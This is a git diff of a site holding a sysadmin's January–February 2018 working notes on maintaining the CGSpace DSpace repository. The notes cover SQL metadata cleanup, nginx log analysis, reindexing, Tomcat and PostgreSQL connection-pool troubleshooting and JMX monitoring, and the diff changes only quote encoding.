  • Otherwise, the DSpace 5 SQL Helper Functions provide ds5_item2itemhandle(), which is much easier than my long query above that I always have to go search for
  • For example, to find the Handle for an item that has the author “Erni”:
  • -
    dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='Erni';
    +
    dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='Erni';
      metadata_value_id | resource_id | metadata_field_id | text_value | text_lang | place |              authority               | confidence | resource_type_id 
     -------------------+-------------+-------------------+------------+-----------+-------+--------------------------------------+------------+------------------
                2612150 |       70308 |                 3 | Erni       |           |     9 | 3fe10c68-6773-49a7-89cc-63eb508723f2 |         -1 |                2
    @@ -809,16 +809,16 @@ dspace=# select ds5_item2itemhandle(70308);
     
    • Next I apply the author deletions:
    -
    $ ./delete-metadata-values.py -i /tmp/2018-01-14-Authors-5-Deletions.csv -f dc.contributor.author -m 3 -d dspace -u dspace -p 'fuuu'
    +
    $ ./delete-metadata-values.py -i /tmp/2018-01-14-Authors-5-Deletions.csv -f dc.contributor.author -m 3 -d dspace -u dspace -p 'fuuu'
     
    • Now working on the affiliation corrections from Peter:
    -
    $ ./fix-metadata-values.py -i /tmp/2018-01-15-Affiliations-888-Corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p 'fuuu'
    -$ ./delete-metadata-values.py -i /tmp/2018-01-15-Affiliations-11-Deletions.csv -f cg.contributor.affiliation -m 211 -d dspace -u dspace -p 'fuuu'
    +
    $ ./fix-metadata-values.py -i /tmp/2018-01-15-Affiliations-888-Corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p 'fuuu'
    +$ ./delete-metadata-values.py -i /tmp/2018-01-15-Affiliations-11-Deletions.csv -f cg.contributor.affiliation -m 211 -d dspace -u dspace -p 'fuuu'
     
    • Now I made a new list of affiliations for Peter to look through:
    -
    dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where metadata_schema_id = 2 and element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
    +
    dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where metadata_schema_id = 2 and element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
     COPY 4552
     
    • Looking over the affiliations again I see dozens of CIAT ones with their affiliation formatted like: International Center for Tropical Agriculture (CIAT)
    • @@ -832,7 +832,7 @@ COPY 4552
    • Looks like we processed 2.9 million requests on CGSpace in 2017-12:
    -
    # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Dec/2017"
    +
    # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Dec/2017"
     2890041
     
     real    0m25.756s
    @@ -845,7 +845,7 @@ sys     0m2.210s
     
  • Discuss standardized names for CRPs and centers with ICARDA (don’t wait for CG Core)
  • Re-send DC rights implementation and forward to everyone so we can move forward with it (without the URI field for now)
  • Start looking at where I was with the AGROVOC API
  • -
  • Have a controlled vocabulary for CGIAR authors' names and ORCIDs? Perhaps values like: Orth, Alan S. (0000-0002-1735-7458)
  • +
  • Have a controlled vocabulary for CGIAR authors’ names and ORCIDs? Perhaps values like: Orth, Alan S. (0000-0002-1735-7458)
  • Need to find the metadata field name that ICARDA is using for their ORCIDs
  • Update text for DSpace version plan on wiki
  • Come up with an SLA, something like: In return for your contribution we will, to the best of our ability, ensure 99.5% (“two and a half nines”) uptime of CGSpace, ensure data is stored in open formats and safely backed up, follow CG Core metadata standards, …
  • @@ -864,14 +864,14 @@ sys 0m2.210s
  • Also, there are whitespace issues in many columns, and the items are mapped to the LIVES and ILRI articles collections, not Theses
  • In any case, importing them like this:
  • -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
     $ dspace import -a -e aorth@mjanja.ch -s /tmp/2018-01-16\ LIVES/SimpleArchiveFormat -m lives.map &> lives.log
     
    • And fantastic, before I started the import there were 10 PostgreSQL connections, and then CGSpace crashed during the upload
    • When I looked there were 210 PostgreSQL connections!
    • I don’t see any high load in XMLUI or REST/OAI:
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "17/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "17/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         381 40.77.167.124
         403 213.55.99.121
         431 207.46.13.60
    @@ -882,7 +882,7 @@ $ dspace import -a -e aorth@mjanja.ch -s /tmp/2018-01-16\ LIVES/SimpleArchiveFor
         593 54.91.48.104
         757 104.196.152.243
         776 66.249.66.90
    -# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "17/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "17/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
          11 205.201.132.14
          11 40.77.167.124
          15 35.226.23.240
    @@ -906,7 +906,7 @@ $ dspace import -a -e aorth@mjanja.ch -s /tmp/2018-01-16\ LIVES/SimpleArchiveFor
     [====================>                              ]40% time remaining: 7 hour(s) 14 minute(s) 45 seconds. timestamp: 2018-01-17 07:57:11
     [====================>                              ]40% time remaining: 7 hour(s) 14 minute(s) 44 seconds. timestamp: 2018-01-17 07:57:37
     [====================>                              ]40% time remaining: 7 hour(s) 16 minute(s) 5 seconds. timestamp: 2018-01-17 07:57:49
    -Exception in thread "http-bio-127.0.0.1-8081-exec-627" java.lang.OutOfMemoryError: Java heap space
    +Exception in thread "http-bio-127.0.0.1-8081-exec-627" java.lang.OutOfMemoryError: Java heap space
             at org.apache.lucene.util.FixedBitSet.clone(FixedBitSet.java:576)
             at org.apache.solr.search.BitDocSet.andNot(BitDocSet.java:222)
             at org.apache.solr.search.SolrIndexSearcher.getProcessedFilter(SolrIndexSearcher.java:1067)
    @@ -1004,7 +1004,7 @@ $ docker run --network dspace-build --name artifactory -d -v artifactory5_data:/
     
  • I don’t see any errors in the nginx or catalina logs, so I guess UptimeRobot just got impatient and closed the request, which caused nginx to send an HTTP 499
  • I realize I never did a full re-index after the SQL author and affiliation updates last week, so I should force one now:
  • -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
     $ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace index-discovery -b
     
    • Maria from Bioversity asked if I could remove the abstracts from all of their Limited Access items in the Bioversity Journal Articles collection
    • @@ -1026,7 +1026,7 @@ Jan 18 07:01:22 linode18 sudo[10812]: pam_unix(sudo:session): session opened for
    • Linode alerted and said that the CPU load was 264.1% on CGSpace
    • Start the Discovery indexing again:
    -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
     $ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace index-discovery -b
     
    • Linode alerted again and said that CGSpace was using 301% CPU
    • @@ -1073,10 +1073,10 @@ sys 0m12.317s
    $ docker exec dspace_db dropdb -U postgres dspace
     $ docker exec dspace_db createdb -U postgres -O dspace --encoding=UNICODE dspace
    -$ docker exec dspace_db psql -U postgres dspace -c 'alter user dspace createuser;'
    +$ docker exec dspace_db psql -U postgres dspace -c 'alter user dspace createuser;'
     $ docker cp test.dump dspace_db:/tmp/test.dump
     $ docker exec dspace_db pg_restore -U postgres -d dspace /tmp/test.dump
    -$ docker exec dspace_db psql -U postgres dspace -c 'alter user dspace nocreateuser;'
    +$ docker exec dspace_db psql -U postgres dspace -c 'alter user dspace nocreateuser;'
     $ docker exec dspace_db vacuumdb -U postgres dspace
     $ docker cp ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspace_db:/tmp
     $ docker exec dspace_db psql -U dspace -f /tmp/update-sequences.sql dspace
    @@ -1119,12 +1119,12 @@ $ ./rest-find-collections.py 10568/1 | grep -i untitled
     
  • Thinking about generating a jmeter test plan for DSpace, along the lines of Georgetown’s dspace-performance-test
  • I got a list of all the GET requests on CGSpace for January 21st (the last time Linode complained the load was high), excluding admin calls:
  • -
    # zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep "21/Jan/2018" | grep "GET " | grep -c -v "/admin"
    +
    # zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep "21/Jan/2018" | grep "GET " | grep -c -v "/admin"
     56405
     
    • Apparently about 28% of these requests were for bitstreams, 30% for the REST API, and 30% for handles:
    -
    # zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep "21/Jan/2018" | grep "GET " | grep -v "/admin" | awk '{print $7}' | grep -Eo "^/(handle|bitstream|rest|oai)/" | sort | uniq -c | sort -n
    +
    # zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep "21/Jan/2018" | grep "GET " | grep -v "/admin" | awk '{print $7}' | grep -Eo "^/(handle|bitstream|rest|oai)/" | sort | uniq -c | sort -n
          38 /oai/
       14406 /bitstream/
       15179 /rest/
    @@ -1132,14 +1132,14 @@ $ ./rest-find-collections.py 10568/1 | grep -i untitled
     
    • And 3% were to the homepage or search:
    -
    # zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep "21/Jan/2018" | grep "GET " | grep -v "/admin" | awk '{print $7}' | grep -Eo '^/($|open-search|discover)' | sort | uniq -c
    +
    # zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep "21/Jan/2018" | grep "GET " | grep -v "/admin" | awk '{print $7}' | grep -Eo '^/($|open-search|discover)' | sort | uniq -c
        1050 /
         413 /discover
         170 /open-search
     
    • The last 10% or so seem to be for static assets that would be served by nginx anyways:
    -
    # zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep "21/Jan/2018" | grep "GET " | grep -v "/admin" | awk '{print $7}' | grep -v bitstream | grep -Eo '\.(js|css|png|jpg|jpeg|php|svg|gif|txt|map)$' | sort | uniq -c | sort -n
    +
    # zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep "21/Jan/2018" | grep "GET " | grep -v "/admin" | awk '{print $7}' | grep -v bitstream | grep -Eo '\.(js|css|png|jpg|jpeg|php|svg|gif|txt|map)$' | sort | uniq -c | sort -n
           2 .gif
           7 .css
          84 .js
    @@ -1153,7 +1153,7 @@ $ ./rest-find-collections.py 10568/1 | grep -i untitled
     
    • Looking at the REST requests, most of them are to expand all or metadata, but 5% are for retrieving bitstreams:
    -
    # zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/library-access.log.4.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/rest.log.4.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/oai.log.4.gz /var/log/nginx/error.log.3.gz /var/log/nginx/error.log.4.gz | grep "21/Jan/2018" | grep "GET " | grep -v "/admin" | awk '{print $7}' | grep -E "^/rest" | grep -Eo "(retrieve|expand=[a-z].*)" | sort | uniq -c | sort -n
    +
    # zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/library-access.log.4.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/rest.log.4.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/oai.log.4.gz /var/log/nginx/error.log.3.gz /var/log/nginx/error.log.4.gz | grep "21/Jan/2018" | grep "GET " | grep -v "/admin" | awk '{print $7}' | grep -E "^/rest" | grep -Eo "(retrieve|expand=[a-z].*)" | sort | uniq -c | sort -n
           1 expand=collections
          16 expand=all&limit=1
          45 expand=items
    @@ -1268,15 +1268,15 @@ $ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.j
     
  • Looking at the DSpace logs I see this error happened just before UptimeRobot noticed it going down:
  • 2018-01-29 05:30:22,226 INFO  org.dspace.usage.LoggerUsageEventListener @ anonymous:session_id=3775D4125D28EF0C691B08345D905141:ip_addr=68.180.229.254:view_item:handle=10568/71890
    -2018-01-29 05:30:22,322 ERROR org.dspace.app.xmlui.aspect.discovery.AbstractSearch @ org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1994+TO+1999]': Encountered " "]" "] "" at line 1, column 32.
    +2018-01-29 05:30:22,322 ERROR org.dspace.app.xmlui.aspect.discovery.AbstractSearch @ org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1994+TO+1999]': Encountered " "]" "] "" at line 1, column 32.
     Was expecting one of:
    -    "TO" ...
    +    "TO" ...
         <RANGE_QUOTED> ...
         <RANGE_GOOP> ...
         
    -org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1994+TO+1999]': Encountered " "]" "] "" at line 1, column 32.
    +org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1994+TO+1999]': Encountered " "]" "] "" at line 1, column 32.
     Was expecting one of:
    -    "TO" ...
    +    "TO" ...
         <RANGE_QUOTED> ...
         <RANGE_GOOP> ...
     
      @@ -1284,12 +1284,12 @@ Was expecting one of:
    • I see a few dozen HTTP 499 errors in the nginx access log for a few minutes before this happened, but HTTP 499 is just when nginx says that the client closed the request early
    • Perhaps this from the nginx error log is relevant?
    -
    2018/01/29 05:26:34 [warn] 26895#26895: *944759 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/16/0000026166 while reading upstream, client: 180.76.15.34, server: cgspace.cgiar.org, request: "GET /bitstream/handle/10947/4658/FISH%20Leaflet.pdf?sequence=12 HTTP/1.1", upstream: "http://127.0.0.1:8443/bitstream/handle/10947/4658/FISH%20Leaflet.pdf?sequence=12", host: "cgspace.cgiar.org"
    +
    2018/01/29 05:26:34 [warn] 26895#26895: *944759 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/16/0000026166 while reading upstream, client: 180.76.15.34, server: cgspace.cgiar.org, request: "GET /bitstream/handle/10947/4658/FISH%20Leaflet.pdf?sequence=12 HTTP/1.1", upstream: "http://127.0.0.1:8443/bitstream/handle/10947/4658/FISH%20Leaflet.pdf?sequence=12", host: "cgspace.cgiar.org"
     
    -
    # awk '($9 ~ /200/) { i++;sum+=$10;max=$10>max?$10:max; } END { printf("Maximum: %d\nAverage: %d\n",max,i?sum/i:0); }' /var/log/nginx/access.log
    +
    # awk '($9 ~ /200/) { i++;sum+=$10;max=$10>max?$10:max; } END { printf("Maximum: %d\nAverage: %d\n",max,i?sum/i:0); }' /var/log/nginx/access.log
     Maximum: 2771268
     Average: 210483
     
      @@ -1297,7 +1297,7 @@ Average: 210483
    • My best guess is that the Solr search error is related somehow but I can’t figure it out
    • We definitely have enough database connections, as I haven’t seen a pool error in weeks:
    -
    $ grep -c "Timeout: Pool empty." dspace.log.2018-01-2*
    +
    $ grep -c "Timeout: Pool empty." dspace.log.2018-01-2*
     dspace.log.2018-01-20:0
     dspace.log.2018-01-21:0
     dspace.log.2018-01-22:0
    @@ -1329,7 +1329,7 @@ dspace.log.2018-01-29:0
     
    [tomcat_*]
         env.host 127.0.0.1
         env.port 8081
    -    env.connector "http-bio-127.0.0.1-8443"
    +    env.connector "http-bio-127.0.0.1-8443"
         env.user munin
         env.password munin
     
      @@ -1345,8 +1345,8 @@ max.value 400
    • Although following the logic of /usr/share/munin/plugins/jmx_tomcat_dbpools could be useful for getting the active Tomcat sessions
    • From debugging the jmx_tomcat_db_pools script from the munin-plugins-java package, I see that this is how you call arbitrary mbeans:
    -
    # port=5400 ip="127.0.0.1" /usr/bin/java -cp /usr/share/munin/munin-jmx-plugins.jar org.munin.plugin.jmx.Beans Catalina:type=DataSource,class=javax.sql.DataSource,name=* maxActive
    -Catalina:type=DataSource,class=javax.sql.DataSource,name="jdbc/dspace"  maxActive       300
    +
    # port=5400 ip="127.0.0.1" /usr/bin/java -cp /usr/share/munin/munin-jmx-plugins.jar org.munin.plugin.jmx.Beans Catalina:type=DataSource,class=javax.sql.DataSource,name=* maxActive
    +Catalina:type=DataSource,class=javax.sql.DataSource,name="jdbc/dspace"  maxActive       300
     
    • There are millions of these status lines, for example in just this one log file:
    -
    # zgrep -c "time remaining" /var/log/tomcat7/catalina.out.1.gz
    +
    # zgrep -c "time remaining" /var/log/tomcat7/catalina.out.1.gz
     1084741
     
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E "31/Jan/2018:(07|08)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E "31/Jan/2018:(07|08)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          67 66.249.66.70
          70 207.46.13.12
          71 197.210.168.174
    @@ -1400,7 +1400,7 @@ javax.ws.rs.WebApplicationException
         198 66.249.66.90
         219 41.204.190.40
         255 2405:204:a208:1e12:132:2a8e:ad28:46c0
    -# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "31/Jan/2018:(07|08)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "31/Jan/2018:(07|08)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           2 65.55.210.187
           2 66.249.66.90
           3 157.55.39.79
    @@ -1426,7 +1426,7 @@ javax.ws.rs.WebApplicationException
     
  • I should make separate database pools for the web applications and the API applications like REST and OAI
  • Ok, so this is interesting: I figured out how to get the MBean path to query Tomcat’s activeSessions from JMX (using munin-plugins-java):
  • -
    # port=5400 ip="127.0.0.1" /usr/bin/java -cp /usr/share/munin/munin-jmx-plugins.jar org.munin.plugin.jmx.Beans Catalina:type=Manager,context=/,host=localhost activeSessions
    +
    # port=5400 ip="127.0.0.1" /usr/bin/java -cp /usr/share/munin/munin-jmx-plugins.jar org.munin.plugin.jmx.Beans Catalina:type=Manager,context=/,host=localhost activeSessions
     Catalina:type=Manager,context=/,host=localhost  activeSessions  8
     
    • If you connect to Tomcat in jvisualvm it’s pretty obvious when you hover over the elements
    • diff --git a/docs/2018-02/index.html b/docs/2018-02/index.html index 9573511ef..a6b590302 100644 --- a/docs/2018-02/index.html +++ b/docs/2018-02/index.html @@ -30,7 +30,7 @@ We don’t need to distinguish between internal and external works, so that Yesterday I figured out how to monitor DSpace sessions using JMX I copied the logic in the jmx_tomcat_dbpools provided by Ubuntu’s munin-plugins-java package and used the stuff I discovered about JMX in 2018-01 "/> - + @@ -139,8 +139,8 @@ v_oai.value 0
    • I finally took a look at the second round of cleanups Peter had sent me for author affiliations in mid January
    • After trimming whitespace and quickly scanning for encoding errors I applied them on CGSpace:
    -
    $ ./delete-metadata-values.py -i /tmp/2018-02-03-Affiliations-12-deletions.csv -f cg.contributor.affiliation -m 211 -d dspace -u dspace -p 'fuuu'
    -$ ./fix-metadata-values.py -i /tmp/2018-02-03-Affiliations-1116-corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p 'fuuu'
    +
    $ ./delete-metadata-values.py -i /tmp/2018-02-03-Affiliations-12-deletions.csv -f cg.contributor.affiliation -m 211 -d dspace -u dspace -p 'fuuu'
    +$ ./fix-metadata-values.py -i /tmp/2018-02-03-Affiliations-1116-corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p 'fuuu'
     
    • Then I started a full Discovery reindex:
    @@ -152,12 +152,12 @@ sys 2m29.088s
    • Generate a new list of affiliations for Peter to sort through:
    -
    dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
    +
    dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
     COPY 3723
     
    • Oh, and it looks like we processed over 3.1 million requests in January, up from 2.9 million in December:
    -
    # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2018"
    +
    # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2018"
     3126109
     
     real    0m23.839s
    @@ -167,14 +167,14 @@ sys     0m1.905s
     
    • Toying with correcting authors with trailing spaces via PostgreSQL:
    -
    dspace=# update metadatavalue set text_value=REGEXP_REPLACE(text_value, '\s+$' , '') where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^.*?\s+$';
    +
    dspace=# update metadatavalue set text_value=REGEXP_REPLACE(text_value, '\s+$' , '') where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^.*?\s+$';
     UPDATE 20
     
    • I tried the TRIM(TRAILING from text_value) function and it said it changed 20 items but the spaces didn’t go away
    • This is on a fresh import of the CGSpace database, but when I tried to apply it on CGSpace there were no changes detected. Weird.
    • Anyways, Peter wants a new list of authors to clean up, so I exported another CSV:
    -
    dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors-2018-02-05.csv with csv;
    +
    dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors-2018-02-05.csv with csv;
     COPY 55630
     

    2018-02-06

      @@ -184,7 +184,7 @@ COPY 55630
    # date
     Tue Feb  6 09:30:32 UTC 2018
    -# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "6/Feb/2018:(08|09)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "6/Feb/2018:(08|09)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           2 223.185.41.40
           2 66.249.64.14
           2 77.246.52.40
    @@ -195,7 +195,7 @@ Tue Feb  6 09:30:32 UTC 2018
           6 154.68.16.34
           7 207.46.13.66
        1548 50.116.102.77
    -# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E "6/Feb/2018:(08|09)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E "6/Feb/2018:(08|09)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          77 213.55.99.121
          86 66.249.64.14
         101 104.196.152.243
    @@ -232,8 +232,8 @@ Tue Feb  6 09:30:32 UTC 2018
     
  • CGSpace crashed again, this time around Wed Feb 7 11:20:28 UTC 2018
  • I took a few snapshots of the PostgreSQL activity at the time and as the minutes went on and the connections were very high at first but reduced on their own:
  • -
    $ psql -c 'select * from pg_stat_activity' > /tmp/pg_stat_activity.txt
    -$ grep -c 'PostgreSQL JDBC' /tmp/pg_stat_activity*
    +
    $ psql -c 'select * from pg_stat_activity' > /tmp/pg_stat_activity.txt
    +$ grep -c 'PostgreSQL JDBC' /tmp/pg_stat_activity*
     /tmp/pg_stat_activity1.txt:300
     /tmp/pg_stat_activity2.txt:272
     /tmp/pg_stat_activity3.txt:168
    @@ -242,7 +242,7 @@ $ grep -c 'PostgreSQL JDBC' /tmp/pg_stat_activity*
     
    • Interestingly, all of those 751 connections were idle!
    -
    $ grep "PostgreSQL JDBC" /tmp/pg_stat_activity* | grep -c idle
    +
    $ grep "PostgreSQL JDBC" /tmp/pg_stat_activity* | grep -c idle
     751
     
    • Since I was restarting Tomcat anyways, I decided to deploy the changes to create two different pools for web and API apps
    • @@ -252,7 +252,7 @@ $ grep -c 'PostgreSQL JDBC' /tmp/pg_stat_activity*
      • Indeed it seems like there were over 1800 sessions today around the hours of 10 and 11 AM:
      -
      $ grep -E '^2018-02-07 (10|11)' dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
      +
      $ grep -E '^2018-02-07 (10|11)' dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
       1828
       
      • CGSpace went down again a few hours later, and now the connections to the dspaceWeb pool are maxed at 250 (the new limit I imposed with the new separate pool scheme)
      • @@ -262,11 +262,11 @@ $ grep -c 'PostgreSQL JDBC' /tmp/pg_stat_activity*
      • … but in PostgreSQL I see them idle or idle in transaction:
      -
      $ psql -c 'select * from pg_stat_activity' | grep -c dspaceWeb
      +
      $ psql -c 'select * from pg_stat_activity' | grep -c dspaceWeb
       250
      -$ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c idle
      +$ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c idle
       250
      -$ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c "idle in transaction"
      +$ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c "idle in transaction"
       187
       
      • What the fuck, does DSpace think all connections are busy?
      • @@ -275,12 +275,12 @@ $ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c "idle
      • Also, WTF, there was a heap space error randomly in catalina.out:
      Wed Feb 07 15:01:54 UTC 2018 | Query:containerItem:91917 AND type:2
      -Exception in thread "http-bio-127.0.0.1-8081-exec-58" java.lang.OutOfMemoryError: Java heap space
      +Exception in thread "http-bio-127.0.0.1-8081-exec-58" java.lang.OutOfMemoryError: Java heap space
       
